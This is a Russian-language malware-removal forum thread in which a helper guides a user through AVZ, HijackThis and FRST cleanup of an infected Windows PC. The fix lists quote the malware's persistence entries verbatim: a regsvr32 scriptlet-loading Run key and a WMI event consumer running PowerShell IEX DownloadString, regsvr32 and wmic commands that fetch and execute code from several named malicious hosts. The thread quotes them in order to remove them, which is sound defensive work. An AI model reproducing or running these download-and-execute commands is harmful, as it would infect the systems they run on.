Что-то мешает работе ПК

[ArCtic]

Прогнал проверку с диска каспера, 1 вирус нашел - удалил, но все равно тупит комп, kaspersky free не хочет даже устанавливаться, все виснет

CollectionLog-2020.02.05-14.27.zip

[Sandor]

Здравствуйте!

 

Пролечите систему с помощью KVRT.

Папку C:\KVRT_Data\Reports упакуйте в архив и прикрепите к следующему сообщению.

 

После этого соберите свежий CollectionLog Автологером.

[ArCtic]

сделал

CollectionLog-2020.02.05-15.06.zip

Reports.rar

[Sandor]

Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО.

 

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\WINDOWS\mssecsvc.exe', '');
 DeleteFile('C:\WINDOWS\mssecsvc.exe', '64');
 DeleteService('mssecsvc2.0');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

Компьютер перезагрузится.

 

 

 

Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com

Полученный ответ сообщите здесь (с указанием номера KL-).

Хотя, вероятно карантин будет пустой.

 

 

"Пофиксите" в HijackThis:

O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll (HKLM) (2020/02/04)
O7 - IPSec: Name: win (2020/02/05) - {a435f289-5707-4b47-bde3-100e722c7fb3} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/05) - {a435f289-5707-4b47-bde3-100e722c7fb3} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/05) - {a435f289-5707-4b47-bde3-100e722c7fb3} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/05) - {a435f289-5707-4b47-bde3-100e722c7fb3} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2020/02/05) - {a435f289-5707-4b47-bde3-100e722c7fb3} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O21 - HKLM\..\ShellIconOverlayIdentifiers\00avast: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: \AVAST Software\Overseer - C:\Program Files\Common Files\Avast Software\Overseer\Overseer.exe /from_scheduler:1
O22 - Task: avast! Emergency Update - C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe (file missing)

Повторите логи по правилам. Для повторной диагностики запустите снова Autologger.

Прикрепите к следующему сообщению свежий CollectionLog.

[ArCtic]

пустой был

CollectionLog-2020.02.05-16.22.zip

[Sandor]

пустой был

Не страшно.

 

Дополнительно:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.

Когда программа запустится, нажмите Yes для соглашения с предупреждением.

 

Нажмите кнопку Scan.

После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.

Подробнее читайте в этом руководстве.

[ArCtic]

готово

Новая папка.rar

[Sandor]

• Отключите до перезагрузки антивирус.
• Выделите следующий код:

  Start::
  CreateRestorePoint:
  (ssssssssss) [File not signed] C:\Windows\inf\aspnet\lsma12.exe
  C:\Windows\inf\aspnet\lsma12.exe
  HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION
  HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
  Task: {41F4E037-FF30-40A0-812A-B1644DC2CF29} - \ok -> No File <==== ATTENTION
  Task: {66BE674B-DC27-44F0-AB1E-E6992EC1A368} - \oka -> No File <==== ATTENTION
  Task: {6CD98BA5-20AF-432B-859F-B21C83523D1A} - \Mysa1 -> No File <==== ATTENTION
  Task: {870C2F1A-7C5E-44B0-BACE-1F60DAF9B7B6} - \Mysa2 -> No File <==== ATTENTION
  Task: {8A1FF6F1-E77A-4563-BCAB-A2E968E2D3C0} - \Mysa -> No File <==== ATTENTION
  Task: {B400F348-1E3F-4D71-8DC0-3E0A1A50614D} - \Mysa3 -> No File <==== ATTENTION
  HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{5ce4092e-d517-4f47-a853-793a7cf73979} <==== ATTENTION (Restriction - IP)
  S2 mssecsvc2.1; C:\WINDOWS\mssecsvr.exe -m security [X]
  NETSVC: Ms5C47DF84App -> no filepath.
  File: C:\Windows\update.exe
  File: C:\Windows\system32\n1.dat
  File: C:\Windows\system32\n.dat
  ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
  WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\"::
  WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION
  WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
  WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99]
  WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION
  WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate]
  EmptyTemp:
  Reboot:
  End::

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

 

Подробнее читайте в этом руководстве.

Изменено 5 февраля, 2020 пользователем Sandor

[ArCtic]

готово

Fixlog.txt

[Sandor]

Файл

C:\Windows\update.exe

удалите вручную.

 

Сообщите что с проблемой.

[ArCtic]

после перезагрузки установил kaspersky free, потом перезагрузил, в итоге проблема вернулась, касперского не оказалось и опять не устанавливается

CollectionLog-2020.02.05-18.58.zip

[Sandor]

"Пофиксите" в HijackThis:

O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"

 

Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО.

 

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe');
 QuarantineFile('C:\Windows\inf\aspnet\lsma12.exe', '');
 QuarantineFileF('C:\Windows\inf\aspnet\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0);
 DeleteFile('C:\Windows\inf\aspnet\lsma12.exe', '');
 DeleteFile('C:\Windows\inf\aspnet\lsma12.exe', '64');
 DeleteFileMask('C:\Windows\inf\aspnet\', '*', true);
 DeleteDirectory('C:\Windows\inf\aspnet\');
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
RebootWindows(true);
end.

Компьютер перезагрузится.

 

 

 

Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com

Полученный ответ сообщите здесь (с указанием номера KLAN).

 

 

 

 

Повторите логи по правилам. Для еще одной повторной диагностики запустите снова Autologger.

Прикрепите к следующему сообщению свежий CollectionLog.

[ArCtic]

В общем, переустановил ОС, с полным форматированием. Спасибо за помощь.